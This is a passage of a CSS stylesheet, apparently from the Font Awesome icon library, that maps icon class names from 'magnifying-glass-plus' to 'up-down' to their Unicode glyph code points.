.fa-magnifying-glass-plus::before { content: "\f00e"; } .fa-search-plus::before { content: "\f00e"; } .fa-manat-sign::before { content: "\e1d5"; } .fa-map::before { content: "\f279"; } .fa-map-location::before { content: "\f59f"; } .fa-map-marked::before { content: "\f59f"; } .fa-map-location-dot::before { content: "\f5a0"; } .fa-map-marked-alt::before { content: "\f5a0"; } .fa-map-pin::before { content: "\f276"; } .fa-marker::before { content: "\f5a1"; } .fa-mars::before { content: "\f222"; } .fa-mars-and-venus::before { content: "\f224"; } .fa-mars-and-venus-burst::before { content: "\e523"; } .fa-mars-double::before { content: "\f227"; } .fa-mars-stroke::before { content: "\f229"; } .fa-mars-stroke-right::before { content: "\f22b"; } .fa-mars-stroke-h::before { content: "\f22b"; } .fa-mars-stroke-up::before { content: "\f22a"; } .fa-mars-stroke-v::before { content: "\f22a"; } .fa-martini-glass::before { content: "\f57b"; } .fa-glass-martini-alt::before { content: "\f57b"; } .fa-martini-glass-citrus::before { content: "\f561"; } .fa-cocktail::before { content: "\f561"; } .fa-martini-glass-empty::before { content: "\f000"; } .fa-glass-martini::before { content: "\f000"; } .fa-mask::before { content: "\f6fa"; } .fa-mask-face::before { content: "\e1d7"; } .fa-mask-ventilator::before { content: "\e524"; } .fa-masks-theater::before { content: "\f630"; } .fa-theater-masks::before { content: "\f630"; } .fa-mattress-pillow::before { content: "\e525"; } .fa-maximize::before { content: "\f31e"; } .fa-expand-arrows-alt::before { content: "\f31e"; } .fa-medal::before { content: "\f5a2"; } .fa-memory::before { content: "\f538"; } .fa-menorah::before { content: "\f676"; } .fa-mercury::before { content: "\f223"; } .fa-message::before { content: "\f27a"; } .fa-comment-alt::before { content: "\f27a"; } .fa-meteor::before { content: "\f753"; } .fa-microchip::before { content: "\f2db"; } .fa-microphone::before { content: "\f130"; } .fa-microphone-lines::before { content: "\f3c9"; } .fa-microphone-alt::before { content: "\f3c9"; } .fa-microphone-lines-slash::before { content: "\f539"; } .fa-microphone-alt-slash::before { content: "\f539"; } .fa-microphone-slash::before { content: "\f131"; } .fa-microscope::before { content: "\f610"; } .fa-mill-sign::before { content: "\e1ed"; } .fa-minimize::before { content: "\f78c"; } .fa-compress-arrows-alt::before { content: "\f78c"; } .fa-minus::before { content: "\f068"; } .fa-subtract::before { content: "\f068"; } .fa-mitten::before { content: "\f7b5"; } .fa-mobile::before { content: "\f3ce"; } .fa-mobile-android::before { content: "\f3ce"; } .fa-mobile-phone::before { content: "\f3ce"; } .fa-mobile-button::before { content: "\f10b"; } .fa-mobile-retro::before { content: "\e527"; } .fa-mobile-screen::before { content: "\f3cf"; } .fa-mobile-android-alt::before { content: "\f3cf"; } .fa-mobile-screen-button::before { content: "\f3cd"; } .fa-mobile-alt::before { content: "\f3cd"; } .fa-money-bill::before { content: "\f0d6"; } .fa-money-bill-1::before { content: "\f3d1"; } .fa-money-bill-alt::before { content: "\f3d1"; } .fa-money-bill-1-wave::before { content: "\f53b"; } .fa-money-bill-wave-alt::before { content: "\f53b"; } .fa-money-bill-transfer::before { content: "\e528"; } .fa-money-bill-trend-up::before { content: "\e529"; } .fa-money-bill-wave::before { content: "\f53a"; } .fa-money-bill-wheat::before { content: "\e52a"; } .fa-money-bills::before { content: "\e1f3"; } .fa-money-check::before { content: "\f53c"; } .fa-money-check-dollar::before { content: "\f53d"; } .fa-money-check-alt::before { content: "\f53d"; } .fa-monument::before { content: "\f5a6"; } .fa-moon::before { content: "\f186"; } .fa-mortar-pestle::before { content: "\f5a7"; } .fa-mosque::before { content: "\f678"; } .fa-mosquito::before { content: "\e52b"; } .fa-mosquito-net::before { content: "\e52c"; } .fa-motorcycle::before { content: "\f21c"; } .fa-mound::before { content: "\e52d"; } .fa-mountain::before { content: "\f6fc"; } .fa-mountain-city::before { content: "\e52e"; } .fa-mountain-sun::before { content: "\e52f"; } .fa-mug-hot::before { content: "\f7b6"; } .fa-mug-saucer::before { content: "\f0f4"; } .fa-coffee::before { content: "\f0f4"; } .fa-music::before { content: "\f001"; } .fa-n::before { content: "\4e"; } .fa-naira-sign::before { content: "\e1f6"; } .fa-network-wired::before { content: "\f6ff"; } .fa-neuter::before { content: "\f22c"; } .fa-newspaper::before { content: "\f1ea"; } .fa-not-equal::before { content: "\f53e"; } .fa-note-sticky::before { content: "\f249"; } .fa-sticky-note::before { content: "\f249"; } .fa-notes-medical::before { content: "\f481"; } .fa-o::before { content: "\4f"; } .fa-object-group::before { content: "\f247"; } .fa-object-ungroup::before { content: "\f248"; } .fa-oil-can::before { content: "\f613"; } .fa-oil-well::before { content: "\e532"; } .fa-om::before { content: "\f679"; } .fa-otter::before { content: "\f700"; } .fa-outdent::before { content: "\f03b"; } .fa-dedent::before { content: "\f03b"; } .fa-p::before { content: "\50"; } .fa-pager::before { content: "\f815"; } .fa-paint-roller::before { content: "\f5aa"; } .fa-paintbrush::before { content: "\f1fc"; } .fa-paint-brush::before { content: "\f1fc"; } .fa-palette::before { content: "\f53f"; } .fa-pallet::before { content: "\f482"; } .fa-panorama::before { content: "\e209"; } .fa-paper-plane::before { content: "\f1d8"; } .fa-paperclip::before { content: "\f0c6"; } .fa-parachute-box::before { content: "\f4cd"; } .fa-paragraph::before { content: "\f1dd"; } .fa-passport::before { content: "\f5ab"; } .fa-paste::before { content: "\f0ea"; } .fa-file-clipboard::before { content: "\f0ea"; } .fa-pause::before { content: "\f04c"; } .fa-paw::before { content: "\f1b0"; } .fa-peace::before { content: "\f67c"; } .fa-pen::before { content: "\f304"; } .fa-pen-clip::before { content: "\f305"; } .fa-pen-alt::before { content: "\f305"; } .fa-pen-fancy::before { content: "\f5ac"; } .fa-pen-nib::before { content: "\f5ad"; } .fa-pen-ruler::before { content: "\f5ae"; } .fa-pencil-ruler::before { content: "\f5ae"; } .fa-pen-to-square::before { content: "\f044"; } .fa-edit::before { content: "\f044"; } .fa-pencil::before { content: "\f303"; } .fa-pencil-alt::before { content: "\f303"; } .fa-people-arrows-left-right::before { content: "\e068"; } .fa-people-arrows::before { content: "\e068"; } .fa-people-carry-box::before { content: "\f4ce"; } .fa-people-carry::before { content: "\f4ce"; } .fa-people-group::before { content: "\e533"; } .fa-people-line::before { content: "\e534"; } .fa-people-pulling::before { content: "\e535"; } .fa-people-robbery::before { content: "\e536"; } .fa-people-roof::before { content: "\e537"; } .fa-pepper-hot::before { content: "\f816"; } .fa-percent::before { content: "\25"; } .fa-percentage::before { content: "\25"; } .fa-person::before { content: "\f183"; } .fa-male::before { content: "\f183"; } .fa-person-arrow-down-to-line::before { content: "\e538"; } .fa-person-arrow-up-from-line::before { content: "\e539"; } .fa-person-biking::before { content: "\f84a"; } .fa-biking::before { content: "\f84a"; } .fa-person-booth::before { content: "\f756"; } .fa-person-breastfeeding::before { content: "\e53a"; } .fa-person-burst::before { content: "\e53b"; } .fa-person-cane::before { content: "\e53c"; } .fa-person-chalkboard::before { content: "\e53d"; } .fa-person-circle-check::before { content: "\e53e"; } .fa-person-circle-exclamation::before { content: "\e53f"; } .fa-person-circle-minus::before { content: "\e540"; } .fa-person-circle-plus::before { content: "\e541"; } .fa-person-circle-question::before { content: "\e542"; } .fa-person-circle-xmark::before { content: "\e543"; } .fa-person-digging::before { content: "\f85e"; } .fa-digging::before { content: "\f85e"; } .fa-person-dots-from-line::before { content: "\f470"; } .fa-diagnoses::before { content: "\f470"; } .fa-person-dress::before { content: "\f182"; } .fa-female::before { content: "\f182"; } .fa-person-dress-burst::before { content: "\e544"; } .fa-person-drowning::before { content: "\e545"; } .fa-person-falling::before { content: "\e546"; } .fa-person-falling-burst::before { content: "\e547"; } .fa-person-half-dress::before { content: "\e548"; } .fa-person-harassing::before { content: "\e549"; } .fa-person-hiking::before { content: "\f6ec"; } .fa-hiking::before { content: "\f6ec"; } .fa-person-military-pointing::before { content: "\e54a"; } .fa-person-military-rifle::before { content: "\e54b"; } .fa-person-military-to-person::before { content: "\e54c"; } .fa-person-praying::before { content: "\f683"; } .fa-pray::before { content: "\f683"; } .fa-person-pregnant::before { content: "\e31e"; } .fa-person-rays::before { content: "\e54d"; } .fa-person-rifle::before { content: "\e54e"; } .fa-person-running::before { content: "\f70c"; } .fa-running::before { content: "\f70c"; } .fa-person-shelter::before { content: "\e54f"; } .fa-person-skating::before { content: "\f7c5"; } .fa-skating::before { content: "\f7c5"; } .fa-person-skiing::before { content: "\f7c9"; } .fa-skiing::before { content: "\f7c9"; } .fa-person-skiing-nordic::before { content: "\f7ca"; } .fa-skiing-nordic::before { content: "\f7ca"; } .fa-person-snowboarding::before { content: "\f7ce"; } .fa-snowboarding::before { content: "\f7ce"; } .fa-person-swimming::before { content: "\f5c4"; } .fa-swimmer::before { content: "\f5c4"; } .fa-person-through-window::before { content: "\e433"; } .fa-person-walking::before { content: "\f554"; } .fa-walking::before { content: "\f554"; } .fa-person-walking-arrow-loop-left::before { content: "\e551"; } .fa-person-walking-arrow-right::before { content: "\e552"; } .fa-person-walking-dashed-line-arrow-right::before { content: "\e553"; } .fa-person-walking-luggage::before { content: "\e554"; } .fa-person-walking-with-cane::before { content: "\f29d"; } .fa-blind::before { content: "\f29d"; } .fa-peseta-sign::before { content: "\e221"; } .fa-peso-sign::before { content: "\e222"; } .fa-phone::before { content: "\f095"; } .fa-phone-flip::before { content: "\f879"; } .fa-phone-alt::before { content: "\f879"; } .fa-phone-slash::before { content: "\f3dd"; } .fa-phone-volume::before { content: "\f2a0"; } .fa-volume-control-phone::before { content: "\f2a0"; } .fa-photo-film::before { content: "\f87c"; } .fa-photo-video::before { content: "\f87c"; } .fa-piggy-bank::before { content: "\f4d3"; } .fa-pills::before { content: "\f484"; } .fa-pizza-slice::before { content: "\f818"; } .fa-place-of-worship::before { content: "\f67f"; } .fa-plane::before { content: "\f072"; } .fa-plane-arrival::before { content: "\f5af"; } .fa-plane-circle-check::before { content: "\e555"; } .fa-plane-circle-exclamation::before { content: "\e556"; } .fa-plane-circle-xmark::before { content: "\e557"; } .fa-plane-departure::before { content: "\f5b0"; } .fa-plane-lock::before { content: "\e558"; } .fa-plane-slash::before { content: "\e069"; } .fa-plane-up::before { content: "\e22d"; } .fa-plant-wilt::before { content: "\e43b"; } .fa-plate-wheat::before { content: "\e55a"; } .fa-play::before { content: "\f04b"; } .fa-plug::before { content: "\f1e6"; } .fa-plug-circle-bolt::before { content: "\e55b"; } .fa-plug-circle-check::before { content: "\e55c"; } .fa-plug-circle-exclamation::before { content: "\e55d"; } .fa-plug-circle-minus::before { content: "\e55e"; } .fa-plug-circle-plus::before { content: "\e55f"; } .fa-plug-circle-xmark::before { content: "\e560"; } .fa-plus::before { content: "\2b"; } .fa-add::before { content: "\2b"; } .fa-plus-minus::before { content: "\e43c"; } .fa-podcast::before { content: "\f2ce"; } .fa-poo::before { content: "\f2fe"; } .fa-poo-storm::before { content: "\f75a"; } .fa-poo-bolt::before { content: "\f75a"; } .fa-poop::before { content: "\f619"; } .fa-power-off::before { content: "\f011"; } .fa-prescription::before { content: "\f5b1"; } .fa-prescription-bottle::before { content: "\f485"; } .fa-prescription-bottle-medical::before { content: "\f486"; } .fa-prescription-bottle-alt::before { content: "\f486"; } .fa-print::before { content: "\f02f"; } .fa-pump-medical::before { content: "\e06a"; } .fa-pump-soap::before { content: "\e06b"; } .fa-puzzle-piece::before { content: "\f12e"; } .fa-q::before { content: "\51"; } .fa-qrcode::before { content: "\f029"; } .fa-question::before { content: "\3f"; } .fa-quote-left::before { content: "\f10d"; } .fa-quote-left-alt::before { content: "\f10d"; } .fa-quote-right::before { content: "\f10e"; } .fa-quote-right-alt::before { content: "\f10e"; } .fa-r::before { content: "\52"; } .fa-radiation::before { content: "\f7b9"; } .fa-radio::before { content: "\f8d7"; } .fa-rainbow::before { content: "\f75b"; } .fa-ranking-star::before { content: "\e561"; } .fa-receipt::before { content: "\f543"; } .fa-record-vinyl::before { content: "\f8d9"; } .fa-rectangle-ad::before { content: "\f641"; } .fa-ad::before { content: "\f641"; } .fa-rectangle-list::before { content: "\f022"; } .fa-list-alt::before { content: "\f022"; } .fa-rectangle-xmark::before { content: "\f410"; } .fa-rectangle-times::before { content: "\f410"; } .fa-times-rectangle::before { content: "\f410"; } .fa-window-close::before { content: "\f410"; } .fa-recycle::before { content: "\f1b8"; } .fa-registered::before { content: "\f25d"; } .fa-repeat::before { content: "\f363"; } .fa-reply::before { content: "\f3e5"; } .fa-mail-reply::before { content: "\f3e5"; } .fa-reply-all::before { content: "\f122"; } .fa-mail-reply-all::before { content: "\f122"; } .fa-republican::before { content: "\f75e"; } .fa-restroom::before { content: "\f7bd"; } .fa-retweet::before { content: "\f079"; } .fa-ribbon::before { content: "\f4d6"; } .fa-right-from-bracket::before { content: "\f2f5"; } .fa-sign-out-alt::before { content: "\f2f5"; } .fa-right-left::before { content: "\f362"; } .fa-exchange-alt::before { content: "\f362"; } .fa-right-long::before { content: "\f30b"; } .fa-long-arrow-alt-right::before { content: "\f30b"; } .fa-right-to-bracket::before { content: "\f2f6"; } .fa-sign-in-alt::before { content: "\f2f6"; } .fa-ring::before { content: "\f70b"; } .fa-road::before { content: "\f018"; } .fa-road-barrier::before { content: "\e562"; } .fa-road-bridge::before { content: "\e563"; } .fa-road-circle-check::before { content: "\e564"; } .fa-road-circle-exclamation::before { content: "\e565"; } .fa-road-circle-xmark::before { content: "\e566"; } .fa-road-lock::before { content: "\e567"; } .fa-road-spikes::before { content: "\e568"; } .fa-robot::before { content: "\f544"; } .fa-rocket::before { content: "\f135"; } .fa-rotate::before { content: "\f2f1"; } .fa-sync-alt::before { content: "\f2f1"; } .fa-rotate-left::before { content: "\f2ea"; } .fa-rotate-back::before { content: "\f2ea"; } .fa-rotate-backward::before { content: "\f2ea"; } .fa-undo-alt::before { content: "\f2ea"; } .fa-rotate-right::before { content: "\f2f9"; } .fa-redo-alt::before { content: "\f2f9"; } .fa-rotate-forward::before { content: "\f2f9"; } .fa-route::before { content: "\f4d7"; } .fa-rss::before { content: "\f09e"; } .fa-feed::before { content: "\f09e"; } .fa-ruble-sign::before { content: "\f158"; } .fa-rouble::before { content: "\f158"; } .fa-rub::before { content: "\f158"; } .fa-ruble::before { content: "\f158"; } .fa-rug::before { content: "\e569"; } .fa-ruler::before { content: "\f545"; } .fa-ruler-combined::before { content: "\f546"; } .fa-ruler-horizontal::before { content: "\f547"; } .fa-ruler-vertical::before { content: "\f548"; } .fa-rupee-sign::before { content: "\f156"; } .fa-rupee::before { content: "\f156"; } .fa-rupiah-sign::before { content: "\e23d"; } .fa-s::before { content: "\53"; } .fa-sack-dollar::before { content: "\f81d"; } .fa-sack-xmark::before { content: "\e56a"; } .fa-sailboat::before { content: "\e445"; } .fa-satellite::before { content: "\f7bf"; } .fa-satellite-dish::before { content: "\f7c0"; } .fa-scale-balanced::before { content: "\f24e"; } .fa-balance-scale::before { content: "\f24e"; } .fa-scale-unbalanced::before { content: "\f515"; } .fa-balance-scale-left::before { content: "\f515"; } .fa-scale-unbalanced-flip::before { content: "\f516"; } .fa-balance-scale-right::before { content: "\f516"; } .fa-school::before { content: "\f549"; } .fa-school-circle-check::before { content: "\e56b"; } .fa-school-circle-exclamation::before { content: "\e56c"; } .fa-school-circle-xmark::before { content: "\e56d"; } .fa-school-flag::before { content: "\e56e"; } .fa-school-lock::before { content: "\e56f"; } .fa-scissors::before { content: "\f0c4"; } .fa-cut::before { content: "\f0c4"; } .fa-screwdriver::before { content: "\f54a"; } .fa-screwdriver-wrench::before { content: "\f7d9"; } .fa-tools::before { content: "\f7d9"; } .fa-scroll::before { content: "\f70e"; } .fa-scroll-torah::before { content: "\f6a0"; } .fa-torah::before { content: "\f6a0"; } .fa-sd-card::before { content: "\f7c2"; } .fa-section::before { content: "\e447"; } .fa-seedling::before { content: "\f4d8"; } .fa-sprout::before { content: "\f4d8"; } .fa-server::before { content: "\f233"; } .fa-shapes::before { content: "\f61f"; } .fa-triangle-circle-square::before { content: "\f61f"; } .fa-share::before { content: "\f064"; } .fa-arrow-turn-right::before { content: "\f064"; } .fa-mail-forward::before { content: "\f064"; } .fa-share-from-square::before { content: "\f14d"; } .fa-share-square::before { content: "\f14d"; } .fa-share-nodes::before { content: "\f1e0"; } .fa-share-alt::before { content: "\f1e0"; } .fa-sheet-plastic::before { content: "\e571"; } .fa-shekel-sign::before { content: "\f20b"; } .fa-ils::before { content: "\f20b"; } .fa-shekel::before { content: "\f20b"; } .fa-sheqel::before { content: "\f20b"; } .fa-sheqel-sign::before { content: "\f20b"; } .fa-shield::before { content: "\f132"; } .fa-shield-blank::before { content: "\f132"; } .fa-shield-cat::before { content: "\e572"; } .fa-shield-dog::before { content: "\e573"; } .fa-shield-halved::before { content: "\f3ed"; } .fa-shield-alt::before { content: "\f3ed"; } .fa-shield-heart::before { content: "\e574"; } .fa-shield-virus::before { content: "\e06c"; } .fa-ship::before { content: "\f21a"; } .fa-shirt::before { content: "\f553"; } .fa-t-shirt::before { content: "\f553"; } .fa-tshirt::before { content: "\f553"; } .fa-shoe-prints::before { content: "\f54b"; } .fa-shop::before { content: "\f54f"; } .fa-store-alt::before { content: "\f54f"; } .fa-shop-lock::before { content: "\e4a5"; } .fa-shop-slash::before { content: "\e070"; } .fa-store-alt-slash::before { content: "\e070"; } .fa-shower::before { content: "\f2cc"; } .fa-shrimp::before { content: "\e448"; } .fa-shuffle::before { content: "\f074"; } .fa-random::before { content: "\f074"; } .fa-shuttle-space::before { content: "\f197"; } .fa-space-shuttle::before { content: "\f197"; } .fa-sign-hanging::before { content: "\f4d9"; } .fa-sign::before { content: "\f4d9"; } .fa-signal::before { content: "\f012"; } .fa-signal-5::before { content: "\f012"; } .fa-signal-perfect::before { content: "\f012"; } .fa-signature::before { content: "\f5b7"; } .fa-signs-post::before { content: "\f277"; } .fa-map-signs::before { content: "\f277"; } .fa-sim-card::before { content: "\f7c4"; } .fa-sink::before { content: "\e06d"; } .fa-sitemap::before { content: "\f0e8"; } .fa-skull::before { content: "\f54c"; } .fa-skull-crossbones::before { content: "\f714"; } .fa-slash::before { content: "\f715"; } .fa-sleigh::before { content: "\f7cc"; } .fa-sliders::before { content: "\f1de"; } .fa-sliders-h::before { content: "\f1de"; } .fa-smog::before { content: "\f75f"; } .fa-smoking::before { content: "\f48d"; } .fa-snowflake::before { content: "\f2dc"; } .fa-snowman::before { content: "\f7d0"; } .fa-snowplow::before { content: "\f7d2"; } .fa-soap::before { content: "\e06e"; } .fa-socks::before { content: "\f696"; } .fa-solar-panel::before { content: "\f5ba"; } .fa-sort::before { content: "\f0dc"; } .fa-unsorted::before { content: "\f0dc"; } .fa-sort-down::before { content: "\f0dd"; } .fa-sort-desc::before { content: "\f0dd"; } .fa-sort-up::before { content: "\f0de"; } .fa-sort-asc::before { content: "\f0de"; } .fa-spa::before { content: "\f5bb"; } .fa-spaghetti-monster-flying::before { content: "\f67b"; } .fa-pastafarianism::before { content: "\f67b"; } .fa-spell-check::before { content: "\f891"; } .fa-spider::before { content: "\f717"; } .fa-spinner::before { content: "\f110"; } .fa-splotch::before { content: "\f5bc"; } .fa-spoon::before { content: "\f2e5"; } .fa-utensil-spoon::before { content: "\f2e5"; } .fa-spray-can::before { content: "\f5bd"; } .fa-spray-can-sparkles::before { content: "\f5d0"; } .fa-air-freshener::before { content: "\f5d0"; } .fa-square::before { content: "\f0c8"; } .fa-square-arrow-up-right::before { content: "\f14c"; } .fa-external-link-square::before { content: "\f14c"; } .fa-square-caret-down::before { content: "\f150"; } .fa-caret-square-down::before { content: "\f150"; } .fa-square-caret-left::before { content: "\f191"; } .fa-caret-square-left::before { content: "\f191"; } .fa-square-caret-right::before { content: "\f152"; } .fa-caret-square-right::before { content: "\f152"; } .fa-square-caret-up::before { content: "\f151"; } .fa-caret-square-up::before { content: "\f151"; } .fa-square-check::before { content: "\f14a"; } .fa-check-square::before { content: "\f14a"; } .fa-square-envelope::before { content: "\f199"; } .fa-envelope-square::before { content: "\f199"; } .fa-square-full::before { content: "\f45c"; } .fa-square-h::before { content: "\f0fd"; } .fa-h-square::before { content: "\f0fd"; } .fa-square-minus::before { content: "\f146"; } .fa-minus-square::before { content: "\f146"; } .fa-square-nfi::before { content: "\e576"; } .fa-square-parking::before { content: "\f540"; } .fa-parking::before { content: "\f540"; } .fa-square-pen::before { content: "\f14b"; } .fa-pen-square::before { content: "\f14b"; } .fa-pencil-square::before { content: "\f14b"; } .fa-square-person-confined::before { content: "\e577"; } .fa-square-phone::before { content: "\f098"; } .fa-phone-square::before { content: "\f098"; } .fa-square-phone-flip::before { content: "\f87b"; } .fa-phone-square-alt::before { content: "\f87b"; } .fa-square-plus::before { content: "\f0fe"; } .fa-plus-square::before { content: "\f0fe"; } .fa-square-poll-horizontal::before { content: "\f682"; } .fa-poll-h::before { content: "\f682"; } .fa-square-poll-vertical::before { content: "\f681"; } .fa-poll::before { content: "\f681"; } .fa-square-root-variable::before { content: "\f698"; } .fa-square-root-alt::before { content: "\f698"; } .fa-square-rss::before { content: "\f143"; } .fa-rss-square::before { content: "\f143"; } .fa-square-share-nodes::before { content: "\f1e1"; } .fa-share-alt-square::before { content: "\f1e1"; } .fa-square-up-right::before { content: "\f360"; } .fa-external-link-square-alt::before { content: "\f360"; } .fa-square-virus::before { content: "\e578"; } .fa-square-xmark::before { content: "\f2d3"; } .fa-times-square::before { content: "\f2d3"; } .fa-xmark-square::before { content: "\f2d3"; } .fa-staff-aesculapius::before { content: "\e579"; } .fa-rod-asclepius::before { content: "\e579"; } .fa-rod-snake::before { content: "\e579"; } .fa-staff-snake::before { content: "\e579"; } .fa-stairs::before { content: "\e289"; } .fa-stamp::before { content: "\f5bf"; } .fa-star::before { content: "\f005"; } .fa-star-and-crescent::before { content: "\f699"; } .fa-star-half::before { content: "\f089"; } .fa-star-half-stroke::before { content: "\f5c0"; } .fa-star-half-alt::before { content: "\f5c0"; } .fa-star-of-david::before { content: "\f69a"; } .fa-star-of-life::before { content: "\f621"; } .fa-sterling-sign::before { content: "\f154"; } .fa-gbp::before { content: "\f154"; } .fa-pound-sign::before { content: "\f154"; } .fa-stethoscope::before { content: "\f0f1"; } .fa-stop::before { content: "\f04d"; } .fa-stopwatch::before { content: "\f2f2"; } .fa-stopwatch-20::before { content: "\e06f"; } .fa-store::before { content: "\f54e"; } .fa-store-slash::before { content: "\e071"; } .fa-street-view::before { content: "\f21d"; } .fa-strikethrough::before { content: "\f0cc"; } .fa-stroopwafel::before { content: "\f551"; } .fa-subscript::before { content: "\f12c"; } .fa-suitcase::before { content: "\f0f2"; } .fa-suitcase-medical::before { content: "\f0fa"; } .fa-medkit::before { content: "\f0fa"; } .fa-suitcase-rolling::before { content: "\f5c1"; } .fa-sun::before { content: "\f185"; } .fa-sun-plant-wilt::before { content: "\e57a"; } .fa-superscript::before { content: "\f12b"; } .fa-swatchbook::before { content: "\f5c3"; } .fa-synagogue::before { content: "\f69b"; } .fa-syringe::before { content: "\f48e"; } .fa-t::before { content: "\54"; } .fa-table::before { content: "\f0ce"; } .fa-table-cells::before { content: "\f00a"; } .fa-th::before { content: "\f00a"; } .fa-table-cells-large::before { content: "\f009"; } .fa-th-large::before { content: "\f009"; } .fa-table-columns::before { content: "\f0db"; } .fa-columns::before { content: "\f0db"; } .fa-table-list::before { content: "\f00b"; } .fa-th-list::before { content: "\f00b"; } .fa-table-tennis-paddle-ball::before { content: "\f45d"; } .fa-ping-pong-paddle-ball::before { content: "\f45d"; } .fa-table-tennis::before { content: "\f45d"; } .fa-tablet::before { content: "\f3fb"; } .fa-tablet-android::before { content: "\f3fb"; } .fa-tablet-button::before { content: "\f10a"; } .fa-tablet-screen-button::before { content: "\f3fa"; } .fa-tablet-alt::before { content: "\f3fa"; } .fa-tablets::before { content: "\f490"; } .fa-tachograph-digital::before { content: "\f566"; } .fa-digital-tachograph::before { content: "\f566"; } .fa-tag::before { content: "\f02b"; } .fa-tags::before { content: "\f02c"; } .fa-tape::before { content: "\f4db"; } .fa-tarp::before { content: "\e57b"; } .fa-tarp-droplet::before { content: "\e57c"; } .fa-taxi::before { content: "\f1ba"; } .fa-cab::before { content: "\f1ba"; } .fa-teeth::before { content: "\f62e"; } .fa-teeth-open::before { content: "\f62f"; } .fa-temperature-arrow-down::before { content: "\e03f"; } .fa-temperature-down::before { content: "\e03f"; } .fa-temperature-arrow-up::before { content: "\e040"; } .fa-temperature-up::before { content: "\e040"; } .fa-temperature-empty::before { content: "\f2cb"; } .fa-temperature-0::before { content: "\f2cb"; } .fa-thermometer-0::before { content: "\f2cb"; } .fa-thermometer-empty::before { content: "\f2cb"; } .fa-temperature-full::before { content: "\f2c7"; } .fa-temperature-4::before { content: "\f2c7"; } .fa-thermometer-4::before { content: "\f2c7"; } .fa-thermometer-full::before { content: "\f2c7"; } .fa-temperature-half::before { content: "\f2c9"; } .fa-temperature-2::before { content: "\f2c9"; } .fa-thermometer-2::before { content: "\f2c9"; } .fa-thermometer-half::before { content: "\f2c9"; } .fa-temperature-high::before { content: "\f769"; } .fa-temperature-low::before { content: "\f76b"; } .fa-temperature-quarter::before { content: "\f2ca"; } .fa-temperature-1::before { content: "\f2ca"; } .fa-thermometer-1::before { content: "\f2ca"; } .fa-thermometer-quarter::before { content: "\f2ca"; } .fa-temperature-three-quarters::before { content: "\f2c8"; } .fa-temperature-3::before { content: "\f2c8"; } .fa-thermometer-3::before { content: "\f2c8"; } .fa-thermometer-three-quarters::before { content: "\f2c8"; } .fa-tenge-sign::before { content: "\f7d7"; } .fa-tenge::before { content: "\f7d7"; } .fa-tent::before { content: "\e57d"; } .fa-tent-arrow-down-to-line::before { content: "\e57e"; } .fa-tent-arrow-left-right::before { content: "\e57f"; } .fa-tent-arrow-turn-left::before { content: "\e580"; } .fa-tent-arrows-down::before { content: "\e581"; } .fa-tents::before { content: "\e582"; } .fa-terminal::before { content: "\f120"; } .fa-text-height::before { content: "\f034"; } .fa-text-slash::before { content: "\f87d"; } .fa-remove-format::before { content: "\f87d"; } .fa-text-width::before { content: "\f035"; } .fa-thermometer::before { content: "\f491"; } .fa-thumbs-down::before { content: "\f165"; } .fa-thumbs-up::before { content: "\f164"; } .fa-thumbtack::before { content: "\f08d"; } .fa-thumb-tack::before { content: "\f08d"; } .fa-ticket::before { content: "\f145"; } .fa-ticket-simple::before { content: "\f3ff"; } .fa-ticket-alt::before { content: "\f3ff"; } .fa-timeline::before { content: "\e29c"; } .fa-toggle-off::before { content: "\f204"; } .fa-toggle-on::before { content: "\f205"; } .fa-toilet::before { content: "\f7d8"; } .fa-toilet-paper::before { content: "\f71e"; } .fa-toilet-paper-slash::before { content: "\e072"; } .fa-toilet-portable::before { content: "\e583"; } .fa-toilets-portable::before { content: "\e584"; } .fa-toolbox::before { content: "\f552"; } .fa-tooth::before { content: "\f5c9"; } .fa-torii-gate::before { content: "\f6a1"; } .fa-tornado::before { content: "\f76f"; } .fa-tower-broadcast::before { content: "\f519"; } .fa-broadcast-tower::before { content: "\f519"; } .fa-tower-cell::before { content: "\e585"; } .fa-tower-observation::before { content: "\e586"; } .fa-tractor::before { content: "\f722"; } .fa-trademark::before { content: "\f25c"; } .fa-traffic-light::before { content: "\f637"; } .fa-trailer::before { content: "\e041"; } .fa-train::before { content: "\f238"; } .fa-train-subway::before { content: "\f239"; } .fa-subway::before { content: "\f239"; } .fa-train-tram::before { content: "\f7da"; } .fa-tram::before { content: "\f7da"; } .fa-transgender::before { content: "\f225"; } .fa-transgender-alt::before { content: "\f225"; } .fa-trash::before { content: "\f1f8"; } .fa-trash-arrow-up::before { content: "\f829"; } .fa-trash-restore::before { content: "\f829"; } .fa-trash-can::before { content: "\f2ed"; } .fa-trash-alt::before { content: "\f2ed"; } .fa-trash-can-arrow-up::before { content: "\f82a"; } .fa-trash-restore-alt::before { content: "\f82a"; } .fa-tree::before { content: "\f1bb"; } .fa-tree-city::before { content: "\e587"; } .fa-triangle-exclamation::before { content: "\f071"; } .fa-exclamation-triangle::before { content: "\f071"; } .fa-warning::before { content: "\f071"; } .fa-trophy::before { content: "\f091"; } .fa-trowel::before { content: "\e589"; } .fa-trowel-bricks::before { content: "\e58a"; } .fa-truck::before { content: "\f0d1"; } .fa-truck-arrow-right::before { content: "\e58b"; } .fa-truck-droplet::before { content: "\e58c"; } .fa-truck-fast::before { content: "\f48b"; } .fa-shipping-fast::before { content: "\f48b"; } .fa-truck-field::before { content: "\e58d"; } .fa-truck-field-un::before { content: "\e58e"; } .fa-truck-front::before { content: "\e2b7"; } .fa-truck-medical::before { content: "\f0f9"; } .fa-ambulance::before { content: "\f0f9"; } .fa-truck-monster::before { content: "\f63b"; } .fa-truck-moving::before { content: "\f4df"; } .fa-truck-pickup::before { content: "\f63c"; } .fa-truck-plane::before { content: "\e58f"; } .fa-truck-ramp-box::before { content: "\f4de"; } .fa-truck-loading::before { content: "\f4de"; } .fa-tty::before { content: "\f1e4"; } .fa-teletype::before { content: "\f1e4"; } .fa-turkish-lira-sign::before { content: "\e2bb"; } .fa-try::before { content: "\e2bb"; } .fa-turkish-lira::before { content: "\e2bb"; } .fa-turn-down::before { content: "\f3be"; } .fa-level-down-alt::before { content: "\f3be"; } .fa-turn-up::before { content: "\f3bf"; } .fa-level-up-alt::before { content: "\f3bf"; } .fa-tv::before { content: "\f26c"; } .fa-television::before { content: "\f26c"; } .fa-tv-alt::before { content: "\f26c"; } .fa-u::before { content: "\55"; } .fa-umbrella::before { content: "\f0e9"; } .fa-umbrella-beach::before { content: "\f5ca"; } .fa-underline::before { content: "\f0cd"; } .fa-universal-access::before { content: "\f29a"; } .fa-unlock::before { content: "\f09c"; } .fa-unlock-keyhole::before { content: "\f13e"; } .fa-unlock-alt::before { content: "\f13e"; } .fa-up-down::before { content: "\f338"; } .fa-arrows-alt-v::before { content: 